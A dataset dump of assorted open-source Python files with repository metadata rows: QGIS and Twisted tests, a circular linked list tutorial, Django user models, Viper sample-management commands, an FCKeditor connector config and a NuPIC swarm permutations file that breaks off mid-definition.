self.assertEqual(len(provider.algorithms()), 2)
tmp_file = QTemporaryFile()
tmp_file.open() # fileName is no available until open
temp_path = tmp_file.fileName()
tmp_file.close()
self.assertTrue(p.write(temp_path))
# restore project
p2 = QgsProject()
provider2 = ProjectProvider(p2)
self.assertTrue(p2.read(temp_path))
self.assertEqual(len(provider2.model_definitions), 2)
self.assertEqual(len(provider2.algorithms()), 2)
self.assertEqual(provider2.algorithms()[0].name(), 'test name')
self.assertEqual(provider2.algorithms()[0].group(), 'test group')
self.assertEqual(provider2.algorithms()[1].name(), 'test name2')
self.assertEqual(provider2.algorithms()[1].group(), 'test group2')
# clear project should remove algorithms
p2.clear()
self.assertFalse(provider2.algorithms())
def testDelete(self):
"""
Test deleting a model from the project
"""
p = QgsProject()
provider = ProjectProvider(p)
# add some models
alg = QgsProcessingModelAlgorithm('test name', 'test group')
provider.add_model(alg)
alg2 = QgsProcessingModelAlgorithm('test name2', 'test group2')
provider.add_model(alg2)
self.assertEqual(len(provider.algorithms()), 2)
# try to delete
provider.remove_model(None)
self.assertEqual(len(provider.algorithms()), 2)
# not in provider!
alg3 = QgsProcessingModelAlgorithm('test name3', 'test group')
provider.remove_model(alg3)
self.assertEqual(len(provider.algorithms()), 2)
# delete model actually in project
provider.remove_model(alg)
self.assertEqual(len(provider.algorithms()), 1)
self.assertEqual(provider.algorithms()[0].name(), 'test name2')
# overwrite model
alg2b = QgsProcessingModelAlgorithm('test name2', 'test group2')
alg2b.setHelpContent({'test': 'test'})
provider.add_model(alg2b)
self.assertEqual(len(provider.algorithms()), 1)
self.assertEqual(provider.algorithms()[0].helpContent(), {'test': 'test'})
provider.remove_model(alg2)
self.assertEqual(len(provider.algorithms()), 0)
def testDialog(self):
"""
Test saving model to project from dialog
"""
p = QgsProject().instance()
provider = ProjectProvider()
QgsApplication.processingRegistry().addProvider(provider)
# make an algorithm
alg = QgsProcessingModelAlgorithm('test name', 'test group')
dialog = ModelerDialog(alg)
dialog.saveInProject()
self.assertEqual(len(provider.model_definitions), 1)
self.assertEqual(len(provider.algorithms()), 1)
self.assertEqual(provider.algorithms()[0].name(), 'test name')
self.assertEqual(provider.algorithms()[0].group(), 'test group')
if __name__ == '__main__':
unittest.main()
| gpl-2.0 | 297,816,019,104,723,400 | 35.440299 | 82 | 0.580176 | false |
insiderr/insiderr-app | ios-patches/basemodules/twisted/python/test/test_runtime.py | 33 | 5431 | # Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.python.runtime}.
"""
from __future__ import division, absolute_import
import sys
from twisted.trial.util import suppress as SUPRESS
from twisted.trial.unittest import SynchronousTestCase
from twisted.python.runtime import Platform, shortPythonVersion
class PythonVersionTests(SynchronousTestCase):
"""
Tests the shortPythonVersion method.
"""
def test_shortPythonVersion(self):
"""
Verify if the Python version is returned correctly.
"""
ver = shortPythonVersion().split('.')
for i in range(3):
self.assertEqual(int(ver[i]), sys.version_info[i])
class PlatformTests(SynchronousTestCase):
"""
Tests for the default L{Platform} initializer.
"""
isWinNTDeprecationMessage = ('twisted.python.runtime.Platform.isWinNT was '
'deprecated in Twisted 13.0. Use Platform.isWindows instead.')
def test_isKnown(self):
"""
L{Platform.isKnown} returns a boolean indicating whether this is one of
the L{runtime.knownPlatforms}.
"""
platform = Platform()
self.assertTrue(platform.isKnown())
def test_isVistaConsistency(self):
"""
Verify consistency of L{Platform.isVista}: it can only be C{True} if
L{Platform.isWinNT} and L{Platform.isWindows} are C{True}.
"""
platform = Platform()
if platform.isVista():
self.assertTrue(platform.isWinNT())
self.assertTrue(platform.isWindows())
self.assertFalse(platform.isMacOSX())
def test_isMacOSXConsistency(self):
"""
L{Platform.isMacOSX} can only return C{True} if L{Platform.getType}
returns C{'posix'}.
"""
platform = Platform()
if platform.isMacOSX():
self.assertEqual(platform.getType(), 'posix')
def test_isLinuxConsistency(self):
"""
L{Platform.isLinux} can only return C{True} if L{Platform.getType}
returns C{'posix'} and L{sys.platform} starts with C{"linux"}.
"""
platform = Platform()
if platform.isLinux():
self.assertTrue(sys.platform.startswith("linux"))
def test_isWinNT(self):
"""
L{Platform.isWinNT} can return only C{False} or C{True} and can not
return C{True} if L{Platform.getType} is not C{"win32"}.
"""
platform = Platform()
isWinNT = platform.isWinNT()
self.assertIn(isWinNT, (False, True))
if platform.getType() != "win32":
self.assertEqual(isWinNT, False)
test_isWinNT.suppress = [SUPRESS(category=DeprecationWarning,
message=isWinNTDeprecationMessage)]
def test_isWinNTDeprecated(self):
"""
L{Platform.isWinNT} is deprecated in favor of L{platform.isWindows}.
"""
platform = Platform()
result = platform.isWinNT()
warnings = self.flushWarnings([self.test_isWinNTDeprecated])
self.assertEqual(len(warnings), 1)
self.assertEqual(
warnings[0]['message'], self.isWinNTDeprecationMessage)
def test_supportsThreads(self):
"""
L{Platform.supportsThreads} returns C{True} if threads can be created in
this runtime, C{False} otherwise.
"""
# It's difficult to test both cases of this without faking the threading
# module. Perhaps an adequate test is to just test the behavior with
# the current runtime, whatever that happens to be.
try:
import threading
except ImportError:
self.assertFalse(Platform().supportsThreads())
else:
self.assertTrue(Platform().supportsThreads())
class ForeignPlatformTests(SynchronousTestCase):
"""
Tests for L{Platform} based overridden initializer values.
"""
def test_getType(self):
"""
If an operating system name is supplied to L{Platform}'s initializer,
L{Platform.getType} returns the platform type which corresponds to that
name.
"""
self.assertEqual(Platform('nt').getType(), 'win32')
self.assertEqual(Platform('ce').getType(), 'win32')
self.assertEqual(Platform('posix').getType(), 'posix')
self.assertEqual(Platform('java').getType(), 'java')
def test_isMacOSX(self):
"""
If a system platform name is supplied to L{Platform}'s initializer, it
is used to determine the result of L{Platform.isMacOSX}, which returns
C{True} for C{"darwin"}, C{False} otherwise.
"""
self.assertTrue(Platform(None, 'darwin').isMacOSX())
self.assertFalse(Platform(None, 'linux2').isMacOSX())
self.assertFalse(Platform(None, 'win32').isMacOSX())
def test_isLinux(self):
"""
If a system platform name is supplied to L{Platform}'s initializer, it
is used to determine the result of L{Platform.isLinux}, which returns
C{True} for values beginning with C{"linux"}, C{False} otherwise.
"""
self.assertFalse(Platform(None, 'darwin').isLinux())
self.assertTrue(Platform(None, 'linux').isLinux())
self.assertTrue(Platform(None, 'linux2').isLinux())
self.assertTrue(Platform(None, 'linux3').isLinux())
self.assertFalse(Platform(None, 'win32').isLinux())
| gpl-3.0 | 2,304,804,071,937,037,800 | 31.915152 | 80 | 0.631375 | false |
vprusso/youtube_tutorials | data_structures/linked_list/circular_linked_list/circular_linked_list_remove.py | 1 | 2755 | # YouTube Video: https://www.youtube.com/watch?v=op42w-5o3nE
class Node:
def __init__(self, data):
self.data = data
self.next = None
class CircularLinkedList:
def __init__(self):
self.head = None
def prepend(self, data):
new_node = Node(data)
cur = self.head
new_node.next = self.head
if not self.head:
new_node.next = new_node
else:
while cur.next != self.head:
cur = cur.next
cur.next = new_node
self.head = new_node
def append(self, data):
if not self.head:
self.head = Node(data)
self.head.next = self.head
else:
new_node = Node(data)
cur = self.head
while cur.next != self.head:
cur = cur.next
cur.next = new_node
new_node.next = self.head
def print_list(self):
cur = self.head
while cur:
print(cur.data)
cur = cur.next
if cur == self.head:
break
def __len__(self):
cur = self.head
count = 0
while cur:
count += 1
cur = cur.next
if cur == self.head:
break
return count
def split_list(self):
size = len(self)
if size == 0:
return None
if size == 1:
return self.head
mid = size//2
count = 0
prev = None
cur = self.head
while cur and count < mid:
count += 1
prev = cur
cur = cur.next
prev.next = self.head
split_cllist = CircularLinkedList()
while cur.next != self.head:
split_cllist.append(cur.data)
cur = cur.next
split_cllist.append(cur.data)
self.print_list()
print("\n")
split_cllist.print_list()
def remove(self, key):
if self.head.next == self.head and self.head.data == key:
self.head = None
return
if self.head.data == key:
cur = self.head
while cur.next != self.head:
cur = cur.next
cur.next = self.head.next
self.head = self.head.next
else:
cur = self.head
prev = None
while cur.next != self.head:
prev = cur
cur = cur.next
if cur.data == key:
prev.next = cur.next
cur = cur.next
cllist = CircularLinkedList()
cllist.append("A")
cllist.append("B")
cllist.append("C")
cllist.append("D")
cllist.remove("A")
cllist.remove("C")
cllist.print_list()
| gpl-3.0 | 3,223,161,314,811,393,000 | 22.956522 | 65 | 0.471143 | false |
fiddlerwoaroof/sandbox | unsorted/pythonsnippets_0045.py | 1 | 1853 | import functools
import collections
def instantiate(cls): return cls()
class Namespace(object):
def registry(name, bases, dict_):
cls = type(name, bases, dict_)
cls.__dict = {}
return cls
__metaclass__ = registry
def __init__(self, instance=None):
self.__dict__ = self.__dict
self.__inst = instance
self._init()
def _init(self): pass
def __get__(self, instance, owner):
result = type(self)(instance)
return result
def __check_inst(self):
if self.__inst is None:
raise AttributeError, 'this class is unbound, can\'t call methods'
def __getattribute__(self, name):
if not name.startswith('_'):
self.__check_inst()
result = object.__getattribute__(self, name)
if callable(result) and not name.startswith('_'):
result = functools.partial(result, self.__inst)
return result
class DB(object):
@instantiate
class record(Namespace):
@classmethod
def _init(self):
self.__value = 1
def get(self, db):
return self.__value
def set(self, db, value):
self.__value = value
def checkparam(self, db):
print db.param.get()
return db.param.get() == self.get()
@instantiate
class param(Namespace):
@classmethod
def _init(self):
self.__value = 1
def get(self, db):
db.othermethod(self.__value)
return self.__value
def set(self, db, value):
db.othermethod(self.__value)
self.__value = value
db.othermethod(self.__value)
def othermethod(self, value): print self, value
def recordget(self): return self.record.get()
def recordset(self, value): return self.record.set(value) | bsd-3-clause | -4,709,682,532,446,254,000 | 30.423729 | 78 | 0.560712 | false |
CollabQ/CollabQ | poboxopenid/util.py | 1 | 2590 | import logging
from django import http
from django.conf import settings
from common import api
from common import clean
from common.models import ExternalProfile
from common import memcache
from common import twitter
from common import user
from common import util
def get_nick_from_email(email):
nick = util.display_nick(email).replace('.', '').replace('_', '')
view = api.actor_lookup_nick(api.ROOT, nick)
if view:
cont = 1
while view is not None:
nick_next = nick+str(cont)
cont+=1
view = api.actor_lookup_nick(api.ROOT, nick_next)
if view is None:
nick = nick_next
return nick
def reponse_if_exists(id, service=None):
if service is None:
view = api.actor_lookup_email(api.ROOT, id)
else:
eprofile = api.get_external_profile(service, id)
if eprofile is not None:
nick = clean.nick(eprofile.nick)
view = api.actor_lookup_nick(api.ROOT, nick)
else:
return None
if view:
response = http.HttpResponseRedirect(view.url('/overview'))
response = user.set_user_cookie(response, view)
return response
return None
def user_create(service, params, username='', id='', remote_url=''):
logging.info("user_create")
actor_ref = api.user_create(api.ROOT, **params)
actor_ref.access_level = "delete"
api.post(actor_ref,
nick=actor_ref.nick,
message='Joined %s!' % (util.get_metadata('SITE_NAME')))
email = params.get('email', None)
if email is not None:
api.email_associate(api.ROOT, actor_ref.nick, email)
else:
key = 'emailneeded_%s' % util.display_nick(actor_ref.nick)
memcache.client.set(key, True, 360)
key = 'firsttime_%s' % util.display_nick(actor_ref.nick)
memcache.client.set(key, True, 360)
external_profile_ref = api.create_external_profile(actor_ref.nick, service, username, id, remote_url)
return actor_ref
def get_full_path(request):
full_path = ('http', ('', 's')[request.is_secure()], '://',
request.META['HTTP_HOST'], request.path)
return ''.join(full_path)
def get_continue_url(request, default_success_url):
continueUrl = request.GET.get('continue', default_success_url)
# Sanitize
if continueUrl.find('//') >= 0 or not continueUrl.startswith('/'):
continueUrl = default_success_url
return continueUrl
def twitter_user():
try:
token = twitter.get_access_request()
except:
return False
apitwitter = twitter.get_api(token)
try:
userinfo = apitwitter.GetUserInfo()
except:
logging.info("Error getting user info")
return False, None
return userinfo, token | apache-2.0 | -1,672,527,653,483,588,600 | 25.989583 | 103 | 0.676834 | false |
bmc/digest | setup.py | 1 | 2013 | #!/usr/bin/env python
#
# EasyInstall setup script for digest
#
# $Id$
# ---------------------------------------------------------------------------
import sys
import os
sys.path += [os.getcwd()]
from setuptools import setup, find_packages
import re
import imp
PKG = 'digest'
DESCRIPTION = 'Calculate message digests of files or standard input'
def load_info():
# Look for identifiers beginning with "__" at the beginning of the line.
result = {}
pattern = re.compile(r'^(__\w+__)\s*=\s*[\'"]([^\'"]*)[\'"]')
here = os.path.dirname(os.path.abspath(sys.argv[0]))
for line in open(os.path.join(here, PKG, '__init__.py'), 'r'):
match = pattern.match(line)
if match:
result[match.group(1)] = match.group(2)
sys.path = [here] + sys.path
mf = os.path.join(here, PKG, '__init__.py')
try:
m = imp.load_module(PKG, open(mf), mf,
('__init__.py', 'r', imp.PY_SOURCE))
result['long_description'] = m.__doc__
except:
result['long_description'] = DESCRIPTION
return result
info = load_info()
# Now the setup stuff.
DOWNLOAD_URL = ('http://pypi.python.org/packages/source/d/%s/%s-%s.tar.gz' %
(PKG, PKG, info['__version__']))
setup (name = PKG,
version = info['__version__'],
description = DESCRIPTION,
long_description = info['long_description'],
packages = find_packages(),
url = info['__url__'],
license = info['__license__'],
author = info['__author__'],
author_email = info['__email__'],
entry_points = {'console_scripts' : 'digest=digest:main'},
classifiers = [
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Topic :: Text Processing :: Filters',
'Topic :: Utilities',
]
)
| bsd-3-clause | -1,755,184,100,655,136,500 | 29.969231 | 77 | 0.525584 | false |
wkschwartz/django | tests/auth_tests/models/custom_user.py | 73 | 3779 | from django.contrib.auth.models import (
AbstractBaseUser, AbstractUser, BaseUserManager, Group, Permission,
PermissionsMixin, UserManager,
)
from django.db import models
# The custom user uses email as the unique identifier, and requires
# that every user provide a date of birth. This lets us test
# changes in username datatype, and non-text required fields.
class CustomUserManager(BaseUserManager):
def create_user(self, email, date_of_birth, password=None, **fields):
"""
Creates and saves a User with the given email and password.
"""
if not email:
raise ValueError('Users must have an email address')
user = self.model(
email=self.normalize_email(email),
date_of_birth=date_of_birth,
**fields
)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email, password, date_of_birth, **fields):
u = self.create_user(email, password=password, date_of_birth=date_of_birth, **fields)
u.is_admin = True
u.save(using=self._db)
return u
class CustomUser(AbstractBaseUser):
email = models.EmailField(verbose_name='email address', max_length=255, unique=True)
is_active = models.BooleanField(default=True)
is_admin = models.BooleanField(default=False)
date_of_birth = models.DateField()
first_name = models.CharField(max_length=50)
custom_objects = CustomUserManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['date_of_birth', 'first_name']
def __str__(self):
return self.email
# Maybe required?
def get_group_permissions(self, obj=None):
return set()
def get_all_permissions(self, obj=None):
return set()
def has_perm(self, perm, obj=None):
return True
def has_perms(self, perm_list, obj=None):
return True
def has_module_perms(self, app_label):
return True
# Admin required fields
@property
def is_staff(self):
return self.is_admin
class RemoveGroupsAndPermissions:
"""
A context manager to temporarily remove the groups and user_permissions M2M
fields from the AbstractUser class, so they don't clash with the
related_name sets.
"""
def __enter__(self):
self._old_au_local_m2m = AbstractUser._meta.local_many_to_many
self._old_pm_local_m2m = PermissionsMixin._meta.local_many_to_many
groups = models.ManyToManyField(Group, blank=True)
groups.contribute_to_class(PermissionsMixin, "groups")
user_permissions = models.ManyToManyField(Permission, blank=True)
user_permissions.contribute_to_class(PermissionsMixin, "user_permissions")
PermissionsMixin._meta.local_many_to_many = [groups, user_permissions]
AbstractUser._meta.local_many_to_many = [groups, user_permissions]
def __exit__(self, exc_type, exc_value, traceback):
AbstractUser._meta.local_many_to_many = self._old_au_local_m2m
PermissionsMixin._meta.local_many_to_many = self._old_pm_local_m2m
class CustomUserWithoutIsActiveField(AbstractBaseUser):
username = models.CharField(max_length=150, unique=True)
email = models.EmailField(unique=True)
objects = UserManager()
USERNAME_FIELD = 'username'
# The extension user is a simple extension of the built-in user class,
# adding a required date_of_birth field. This allows us to check for
# any hard references to the name "User" in forms/handlers etc.
with RemoveGroupsAndPermissions():
class ExtensionUser(AbstractUser):
date_of_birth = models.DateField()
custom_objects = UserManager()
REQUIRED_FIELDS = AbstractUser.REQUIRED_FIELDS + ['date_of_birth']
| bsd-3-clause | 17,085,836,832,844,920 | 32.741071 | 93 | 0.677693 | false |
cherry-wb/viper | viper/core/ui/commands.py | 1 | 10438 | import os
import getopt
import tempfile
from viper.common.out import *
from viper.common.objects import File
from viper.common.colors import bold, cyan, white
from viper.common.network import download
from viper.core.session import __session__
from viper.core.plugins import __modules__
from viper.core.database import Database
from viper.core.storage import store_sample, get_sample_path
class Commands(object):
def __init__(self):
# Open connection to the database.
self.db = Database()
# Map commands to their related functions.
self.commands = dict(
help=dict(obj=self.cmd_help, description="Show this help message"),
open=dict(obj=self.cmd_open, description="Open a file"),
close=dict(obj=self.cmd_close, description="Close the current session"),
info=dict(obj=self.cmd_info, description="Show information on the opened file"),
clear=dict(obj=self.cmd_clear, description="Clear the console"),
store=dict(obj=self.cmd_store, description="Store the opened file to the local repository"),
delete=dict(obj=self.cmd_delete, description="Delete the opened file"),
find=dict(obj=self.cmd_find, description="Find a file"),
)
##
# CLEAR
#
# This command simply clears the shell.
def cmd_clear(self, *args):
os.system('clear')
##
# HELP
#
# This command simply prints the help message.
# It lists both embedded commands and loaded modules.
def cmd_help(self, *args):
print(bold("Commands:"))
rows = []
for command_name, command_item in self.commands.items():
rows.append([command_name, command_item['description']])
print(table(['Command', 'Description'], rows))
print("")
print(bold("Modules:"))
rows = []
for module_name, module_item in __modules__.items():
rows.append([module_name, module_item['description']])
print(table(['Command', 'Description'], rows))
##
# OPEN
#
# This command is used to open a session on a given file.
# It either can be an external file path, or a SHA256 hash of a file which
# has been previously imported and stored.
# While the session is active, every operation and module executed will be
# run against the file specified.
def cmd_open(self, *args):
def usage():
print("usage: open [-h] [-f] [-u] [-t] <target>")
def help():
usage()
print("")
print("Options:")
print("\t--help (-h)\tShow this help message")
print("\t--file (-f)\tThe target is a file")
print("\t--url (-u)\tThe target is a URL")
print("\t--tor (-t)\tDownload the file through Tor")
print("")
print("You can also specify a SHA256 hash to a previously stored")
print("file in order to open a session on it.")
print("")
try:
opts, argv = getopt.getopt(args, 'hfut', ['help', 'file', 'url', 'tor'])
except getopt.GetoptError as e:
print(e)
usage()
return
is_file = False
is_url = False
use_tor = False
for opt, value in opts:
if opt in ('-h', '--help'):
help()
return
elif opt in ('-f', '--file'):
is_file = True
elif opt in ('-u', '--url'):
is_url = True
elif opt in ('-t', '--tor'):
use_tor = True
if len(argv) == 0:
usage()
return
else:
target = argv[0]
# If it's a file path, open a session on it.
if is_file:
target = os.path.expanduser(target)
if not os.path.exists(target) or not os.path.isfile(target):
print_error("File not found")
return
__session__.set(target)
# If it's a URL, download it and open a session on the temporary
# file.
elif is_url:
data = download(url=target, tor=use_tor)
if data:
tmp = tempfile.NamedTemporaryFile(delete=False)
tmp.write(data)
tmp.close()
__session__.set(tmp.name)
# Otherwise we assume it's an hash of an previously stored sample.
else:
target = argv[0].strip().lower()
path = get_sample_path(target)
if path:
__session__.set(path)
##
# CLOSE
#
# This command resets the open session.
# After that, all handles to the opened file should be closed and the
# shell should be restored to the default prompt.
def cmd_close(self, *args):
__session__.clear()
##
# INFO
#
# This command returns information on the open session. It returns details
# on the file (e.g. hashes) and other information that might available from
# the database.
def cmd_info(self, *args):
if __session__.is_set():
print(table(
['Key', 'Value'],
[
('Name', __session__.file.name),
('Tags', __session__.file.tags),
('Path', __session__.file.path),
('Size', __session__.file.size),
('Type', __session__.file.type),
('MD5', __session__.file.md5),
('SHA1', __session__.file.sha1),
('SHA256', __session__.file.sha256),
('SHA512', __session__.file.sha512),
('SSdeep', __session__.file.ssdeep),
('CRC32', __session__.file.crc32)
]
))
##
# STORE
#
# This command stores the opened file in the local repository and tries
# to store details in the database.
def cmd_store(self, *args):
def usage():
print("usage: store [-h] [-d] [-f <path>] [-t]")
def help():
usage()
print("")
print("Options:")
print("\t--help (-h)\tShow this help message")
print("\t--delete (-d)\tDelete the original file")
print("\t--folder (-f)\tSpecify a folder to import")
print("\t--tags (-t)\tSpecify a list of comma-separated tags")
print("")
try:
opts, argv = getopt.getopt(args, 'hdf:t:', ['help', 'delete', 'folder=', 'tags='])
except getopt.GetoptError as e:
print(e)
usage()
return
do_delete = False
folder = False
tags = None
for opt, value in opts:
if opt in ('-h', '--help'):
help()
return
elif opt in ('-d', '--delete'):
do_delete = True
elif opt in ('-f', '--folder'):
folder = value
elif opt in ('-t', '--tags'):
tags = value
def add_file(obj, tags=None):
# Store file to the local repository.
new_path = store_sample(obj)
if new_path:
# Add file to the database.
status = self.db.add(obj=obj, tags=tags)
print_success("Stored to: {0}".format(new_path))
# Delete the file if requested to do so.
if do_delete:
try:
os.unlink(obj.path)
except Exception as e:
print_warning("Failed deleting file: {0}".format(e))
# If the user specified the --folder flag, we walk recursively and try
# to add all contained files to the local repository.
# This is note going to open a new session.
# TODO: perhaps disable or make recursion optional?
if folder:
# Check if the specified folder is valid.
if os.path.isdir(folder):
# Walk through the folder and subfolders.
for dir_name, dir_names, file_names in os.walk(folder):
# Add each collected file.
for file_name in file_names:
file_path = os.path.join(dir_name, file_name)
file_obj = File(file_path)
# Add file.
add_file(file_obj, tags)
else:
print_error("You specified an invalid folder: {0}".format(folder))
# Otherwise we try to store the currently opened file, if there is any.
else:
if __session__.is_set():
# Add file.
add_file(__session__.file, tags)
# Open session to the new file.
self.cmd_open(*[__session__.file.sha256])
else:
print_error("No session opened")
##
# DELETE
#
# This commands deletes the currenlty opened file (only if it's stored in
# the local repository) and removes the details from the database
def cmd_delete(self, *args):
if __session__.is_set():
while True:
choice = raw_input("Are you sure you want to delete this binary? Can't be reverted! [y/n] ")
if choice == 'y':
break
elif choice == 'n':
return
rows = self.db.find('sha256', __session__.file.sha256)
if rows:
malware_id = rows[0].id
if self.db.delete(malware_id):
print_success("File deleted")
else:
print_error("Unable to delete file")
os.remove(get_sample_path(__session__.file.sha256))
__session__.clear()
##
# FIND
#
# This command is used to search for files in the database.
def cmd_find(self, *args):
if len(args) == 0:
print_error("Invalid search term")
return
key = args[0]
try:
value = args[1]
except IndexError:
value = None
items = self.db.find(key, value)
if not items:
return
rows = []
for item in items:
rows.append([item.name, item.type, item.sha256])
print(table(['Name', 'Type', 'SHA256'], rows))
| bsd-3-clause | -4,457,562,119,359,480,300 | 32.88961 | 108 | 0.511017 | false |
quanganh/fckeditor | public/javascripts/fckeditor/editor/filemanager/connectors/py/config.py | 93 | 7095 | #!/usr/bin/env python
"""
* FCKeditor - The text editor for Internet - http://www.fckeditor.net
* Copyright (C) 2003-2008 Frederico Caldeira Knabben
*
* == BEGIN LICENSE ==
*
* Licensed under the terms of any of the following licenses at your
* choice:
*
* - GNU General Public License Version 2 or later (the "GPL")
* http://www.gnu.org/licenses/gpl.html
*
* - GNU Lesser General Public License Version 2.1 or later (the "LGPL")
* http://www.gnu.org/licenses/lgpl.html
*
* - Mozilla Public License Version 1.1 or later (the "MPL")
* http://www.mozilla.org/MPL/MPL-1.1.html
*
* == END LICENSE ==
*
* Configuration file for the File Manager Connector for Python
"""
# INSTALLATION NOTE: You must set up your server environment accordingly to run
# python scripts. This connector requires Python 2.4 or greater.
#
# Supported operation modes:
# * WSGI (recommended): You'll need apache + mod_python + modpython_gateway
# or any web server capable of the WSGI python standard
# * Plain Old CGI: Any server capable of running standard python scripts
# (although mod_python is recommended for performance)
# This was the previous connector version operation mode
#
# If you're using Apache web server, replace the htaccess.txt to to .htaccess,
# and set the proper options and paths.
# For WSGI and mod_python, you may need to download modpython_gateway from:
# http://projects.amor.org/misc/svn/modpython_gateway.py and copy it in this
# directory.
# SECURITY: You must explicitly enable this "connector". (Set it to "True").
# WARNING: don't just set "ConfigIsEnabled = True", you must be sure that only
# authenticated users can access this file or use some kind of session checking.
Enabled = False
# Path to user files relative to the document root.
UserFilesPath = '/userfiles/'
# Fill the following value it you prefer to specify the absolute path for the
# user files directory. Useful if you are using a virtual directory, symbolic
# link or alias. Examples: 'C:\\MySite\\userfiles\\' or '/root/mysite/userfiles/'.
# Attention: The above 'UserFilesPath' must point to the same directory.
# WARNING: GetRootPath may not work in virtual or mod_python configurations, and
# may not be thread safe. Use this configuration parameter instead.
UserFilesAbsolutePath = ''
# Due to security issues with Apache modules, it is recommended to leave the
# following setting enabled.
ForceSingleExtension = True
# What the user can do with this connector
ConfigAllowedCommands = [ 'QuickUpload', 'FileUpload', 'GetFolders', 'GetFoldersAndFiles', 'CreateFolder' ]
# Allowed Resource Types
ConfigAllowedTypes = ['File', 'Image', 'Flash', 'Media']
# After file is uploaded, sometimes it is required to change its permissions
# so that it was possible to access it at the later time.
# If possible, it is recommended to set more restrictive permissions, like 0755.
# Set to 0 to disable this feature.
# Note: not needed on Windows-based servers.
ChmodOnUpload = 0755
# See comments above.
# Used when creating folders that does not exist.
ChmodOnFolderCreate = 0755
# Do not touch this 3 lines, see "Configuration settings for each Resource Type"
AllowedExtensions = {}; DeniedExtensions = {};
FileTypesPath = {}; FileTypesAbsolutePath = {};
QuickUploadPath = {}; QuickUploadAbsolutePath = {};
# Configuration settings for each Resource Type
#
# - AllowedExtensions: the possible extensions that can be allowed.
# If it is empty then any file type can be uploaded.
# - DeniedExtensions: The extensions that won't be allowed.
# If it is empty then no restrictions are done here.
#
# For a file to be uploaded it has to fulfill both the AllowedExtensions
# and DeniedExtensions (that's it: not being denied) conditions.
#
# - FileTypesPath: the virtual folder relative to the document root where
# these resources will be located.
# Attention: It must start and end with a slash: '/'
#
# - FileTypesAbsolutePath: the physical path to the above folder. It must be
# an absolute path.
# If it's an empty string then it will be autocalculated.
# Useful if you are using a virtual directory, symbolic link or alias.
# Examples: 'C:\\MySite\\userfiles\\' or '/root/mysite/userfiles/'.
# Attention: The above 'FileTypesPath' must point to the same directory.
# Attention: It must end with a slash: '/'
#
#
# - QuickUploadPath: the virtual folder relative to the document root where
# these resources will be uploaded using the Upload tab in the resources
# dialogs.
# Attention: It must start and end with a slash: '/'
#
# - QuickUploadAbsolutePath: the physical path to the above folder. It must be
# an absolute path.
# If it's an empty string then it will be autocalculated.
# Useful if you are using a virtual directory, symbolic link or alias.
# Examples: 'C:\\MySite\\userfiles\\' or '/root/mysite/userfiles/'.
# Attention: The above 'QuickUploadPath' must point to the same directory.
# Attention: It must end with a slash: '/'
AllowedExtensions['File'] = ['7z','aiff','asf','avi','bmp','csv','doc','fla','flv','gif','gz','gzip','jpeg','jpg','mid','mov','mp3','mp4','mpc','mpeg','mpg','ods','odt','pdf','png','ppt','pxd','qt','ram','rar','rm','rmi','rmvb','rtf','sdc','sitd','swf','sxc','sxw','tar','tgz','tif','tiff','txt','vsd','wav','wma','wmv','xls','xml','zip']
DeniedExtensions['File'] = []
FileTypesPath['File'] = UserFilesPath + 'file/'
FileTypesAbsolutePath['File'] = (not UserFilesAbsolutePath == '') and (UserFilesAbsolutePath + 'file/') or ''
QuickUploadPath['File'] = FileTypesPath['File']
QuickUploadAbsolutePath['File'] = FileTypesAbsolutePath['File']
AllowedExtensions['Image'] = ['bmp','gif','jpeg','jpg','png']
DeniedExtensions['Image'] = []
FileTypesPath['Image'] = UserFilesPath + 'image/'
FileTypesAbsolutePath['Image'] = (not UserFilesAbsolutePath == '') and UserFilesAbsolutePath + 'image/' or ''
QuickUploadPath['Image'] = FileTypesPath['Image']
QuickUploadAbsolutePath['Image']= FileTypesAbsolutePath['Image']
AllowedExtensions['Flash'] = ['swf','flv']
DeniedExtensions['Flash'] = []
FileTypesPath['Flash'] = UserFilesPath + 'flash/'
FileTypesAbsolutePath['Flash'] = ( not UserFilesAbsolutePath == '') and UserFilesAbsolutePath + 'flash/' or ''
QuickUploadPath['Flash'] = FileTypesPath['Flash']
QuickUploadAbsolutePath['Flash']= FileTypesAbsolutePath['Flash']
AllowedExtensions['Media'] = ['aiff','asf','avi','bmp','fla', 'flv','gif','jpeg','jpg','mid','mov','mp3','mp4','mpc','mpeg','mpg','png','qt','ram','rm','rmi','rmvb','swf','tif','tiff','wav','wma','wmv']
DeniedExtensions['Media'] = []
FileTypesPath['Media'] = UserFilesPath + 'media/'
FileTypesAbsolutePath['Media'] = ( not UserFilesAbsolutePath == '') and UserFilesAbsolutePath + 'media/' or ''
QuickUploadPath['Media'] = FileTypesPath['Media']
QuickUploadAbsolutePath['Media']= FileTypesAbsolutePath['Media']
| mit | -392,230,004,533,565,630 | 46.59589 | 340 | 0.69852 | false |
rcrowder/nupic | tests/swarming/nupic/swarming/experiments/dummyV2/permutations.py | 10 | 3634 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""
Template file used by ExpGenerator to generate the actual
permutations.py file by replacing $XXXXXXXX tokens with desired values.
This permutations.py file was generated by:
'/Users/ronmarianetti/nupic/eng/lib/python2.6/site-packages/nupic/frameworks/opf/expGenerator/experiment_generator.py'
"""
import os
from nupic.swarming.permutation_helpers import *
# The name of the field being predicted. Any allowed permutation MUST contain
# the prediction field.
# (generated from PREDICTION_FIELD)
predictedField = 'consumption'
permutations = {
'modelParams': {
'sensorParams': {
'encoders': {
'gym': PermuteEncoder(fieldName='gym', encoderClass='SDRCategoryEncoder', w=21, n=300),
'timestamp_dayOfWeek': PermuteEncoder(fieldName='timestamp', encoderClass='DateEncoder.dayOfWeek', radius=PermuteChoices([1, 3]), w=7),
